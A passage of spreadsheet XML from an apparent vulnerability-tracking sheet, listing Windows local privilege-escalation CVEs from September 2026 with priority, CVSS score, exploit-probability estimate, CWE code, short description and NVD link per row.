        <v>7</v>
      </c>
      <c r="D3393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3393" s="5" t="inlineStr"/>
      <c r="F3393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3393" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3393" s="5" t="inlineStr"/>
      <c r="I3393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3393" s="5" t="inlineStr"/>
      <c r="K3393" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3393" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t>
        </is>
      </c>
    </row>
    <row r="3394">
      <c r="A3394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69311</t>
        </is>
      </c>
      <c r="C3394" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3394" s="5" t="inlineStr"/>
      <c r="F3394" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3394" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3394" s="5" t="inlineStr"/>
      <c r="I3394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3394" s="5" t="inlineStr"/>
      <c r="K3394" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3394" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t>
        </is>
      </c>
    </row>
    <row r="3395">
      <c r="A3395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="C3395" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3395" s="5" t="inlineStr"/>
      <c r="F3395" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3395" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3395" s="5" t="inlineStr"/>
      <c r="I3395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3395" s="5" t="inlineStr"/>
      <c r="K3395" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3395" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="3396">
      <c r="A3396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69331</t>
        </is>
      </c>
      <c r="C3396" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3396" s="5" t="inlineStr"/>
      <c r="F3396" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3396" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3396" s="5" t="inlineStr"/>
      <c r="I3396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3396" s="5" t="inlineStr"/>
      <c r="K3396" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3396" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t>
        </is>
      </c>
    </row>
    <row r="3397">
      <c r="A3397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69333</t>
        </is>
      </c>
      <c r="C3397" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3397" s="5" t="inlineStr"/>
      <c r="F3397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3397" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3397" s="5" t="inlineStr"/>
      <c r="I3397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3397" s="5" t="inlineStr"/>
      <c r="K3397" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3397" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t>
        </is>
      </c>
    </row>
    <row r="3398">
      <c r="A3398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69335</t>
        </is>
      </c>
      <c r="C3398" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3398" s="5" t="inlineStr"/>
      <c r="F3398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3398" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3398" s="5" t="inlineStr"/>
      <c r="I3398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3398" s="5" t="inlineStr"/>
      <c r="K3398" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3398" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t>
        </is>
      </c>
    </row>
    <row r="3399">
      <c r="A3399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69341</t>
        </is>
      </c>
      <c r="C3399" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3399" s="5" t="inlineStr"/>
      <c r="F3399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3399" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3399" s="5" t="inlineStr"/>
      <c r="I3399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3399" s="5" t="inlineStr"/>
      <c r="K3399" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3399" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t>
        </is>
      </c>
    </row>
    <row r="3400">
      <c r="A3400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69362</t>
        </is>
      </c>
      <c r="C3400" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3400" s="5" t="inlineStr"/>
      <c r="F3400" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3400" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3400" s="5" t="inlineStr"/>
      <c r="I3400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3400" s="5" t="inlineStr"/>
      <c r="K3400" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3400" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t>
        </is>
      </c>
    </row>
    <row r="3401">
      <c r="A3401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="C3401" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3401" s="5" t="inlineStr"/>
      <c r="F3401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3401" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3401" s="5" t="inlineStr"/>
      <c r="I3401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3401" s="5" t="inlineStr"/>
      <c r="K3401" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3401" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="3402">
      <c r="A3402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69383</t>
        </is>
      </c>
      <c r="C3402" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3402" s="5" t="inlineStr"/>
      <c r="F3402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3402" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3402" s="5" t="inlineStr"/>
      <c r="I3402" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3402" s="5" t="inlineStr"/>
      <c r="K3402" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3402" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t>
        </is>
      </c>
    </row>
    <row r="3403">
      <c r="A3403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69385</t>
        </is>
      </c>
      <c r="C3403" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3403" s="5" t="inlineStr"/>
      <c r="F3403" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3403" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3403" s="5" t="inlineStr"/>
      <c r="I3403" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3403" s="5" t="inlineStr"/>
      <c r="K3403" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3403" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t>
        </is>
      </c>
    </row>
    <row r="3404">
      <c r="A3404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69388</t>
        </is>
      </c>
      <c r="C3404" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3404" s="5" t="inlineStr"/>
      <c r="F3404" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3404" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3404" s="5" t="inlineStr"/>
      <c r="I3404" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3404" s="5" t="inlineStr"/>
      <c r="K3404" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3404" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t>
        </is>
      </c>
    </row>
    <row r="3405">
      <c r="A3405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69394</t>
        </is>
      </c>
      <c r="C3405" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3405" s="5" t="inlineStr"/>
      <c r="F3405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3405" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3405" s="5" t="inlineStr"/>
      <c r="I3405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3405" s="5" t="inlineStr"/>
      <c r="K3405" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3405" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t>
        </is>
      </c>
    </row>
    <row r="3406">
      <c r="A3406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69398</t>
        </is>
      </c>
      <c r="C3406" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3406" s="5" t="inlineStr"/>
      <c r="F3406" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3406" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3406" s="5" t="inlineStr"/>
      <c r="I3406" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3406" s="5" t="inlineStr"/>
      <c r="K3406" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-415</t>
        </is>
      </c>
      <c r="L3406" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t>
        </is>
      </c>
    </row>
    <row r="3407">
      <c r="A3407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69401</t>
        </is>
      </c>
      <c r="C3407" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3407" s="5" t="inlineStr"/>
      <c r="F3407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3407" s="5" t="inlineStr"/>
      <c r="H3407" s="5" t="inlineStr"/>
      <c r="I3407" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3407" s="5" t="inlineStr"/>
      <c r="K3407" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3407" s="5" t="inlineStr">
        <is>
          <t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t>
        </is>
      </c>
    </row>
    <row r="3408">
      <c r="A3408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69404</t>
        </is>
      </c>
      <c r="C3408" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3408" s="5" t="inlineStr"/>
      <c r="F3408" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3408" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3408" s="5" t="inlineStr"/>
      <c r="I3408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3408" s="5" t="inlineStr"/>
      <c r="K3408" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3408" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t>
        </is>
      </c>
    </row>
    <row r="3409">
      <c r="A3409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69410</t>
        </is>
      </c>
      <c r="C3409" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3409" s="5" t="inlineStr"/>
      <c r="F3409" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3409" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3409" s="5" t="inlineStr"/>
      <c r="I3409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3409" s="5" t="inlineStr"/>
      <c r="K3409" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3409" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t>
        </is>
      </c>
    </row>
    <row r="3410">
      <c r="A3410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="C3410" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3410" s="5" t="inlineStr"/>
      <c r="F3410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3410" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3410" s="5" t="inlineStr"/>
      <c r="I3410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3410" s="5" t="inlineStr"/>
      <c r="K3410" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3410" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="3411">
      <c r="A3411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="C3411" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3411" s="5" t="inlineStr"/>
      <c r="F3411" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3411" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3411" s="5" t="inlineStr"/>
      <c r="I3411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3411" s="5" t="inlineStr"/>
      <c r="K3411" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3411" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="3412">
      <c r="A3412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69430</t>
        </is>
      </c>
      <c r="C3412" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3412" s="5" t="inlineStr"/>
      <c r="F3412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3412" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3412" s="5" t="inlineStr"/>
      <c r="I3412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3412" s="5" t="inlineStr"/>
      <c r="K3412" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3412" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t>
        </is>
      </c>
    </row>
    <row r="3413">
      <c r="A3413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69440</t>
        </is>
      </c>
      <c r="C3413" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3413" s="5" t="inlineStr"/>
      <c r="F3413" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3413" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3413" s="5" t="inlineStr"/>
      <c r="I3413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3413" s="5" t="inlineStr"/>
      <c r="K3413" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3413" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t>
        </is>
      </c>
    </row>
    <row r="3414">
      <c r="A3414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69441</t>
        </is>
      </c>
      <c r="C3414" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3414" s="5" t="inlineStr"/>
      <c r="F3414" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3414" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3414" s="5" t="inlineStr"/>
      <c r="I3414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3414" s="5" t="inlineStr"/>
      <c r="K3414" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3414" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t>
        </is>
      </c>
    </row>
    <row r="3415">
      <c r="A3415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69448</t>
        </is>
      </c>
      <c r="C3415" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3415" s="5" t="inlineStr"/>
      <c r="F3415" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3415" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3415" s="5" t="inlineStr"/>
      <c r="I3415" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3415" s="5" t="inlineStr"/>
      <c r="K3415" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3415" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t>
        </is>
      </c>
    </row>
    <row r="3416">
      <c r="A3416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
      <c r="C3416" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3416" s="5" t="inlineStr"/>
      <c r="F3416" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3416" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3416" s="5" t="inlineStr"/>
      <c r="I3416" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3416" s="5" t="inlineStr"/>
      <c r="K3416" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3416" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="3417">
      <c r="A3417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69468</t>
        </is>
      </c>
      <c r="C3417" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3417" s="5" t="inlineStr"/>
      <c r="F3417" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3417" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3417" s="5" t="inlineStr"/>
      <c r="I3417" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3417" s="5" t="inlineStr"/>
      <c r="K3417" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3417" s="5" t="inlineStr">
        <is>
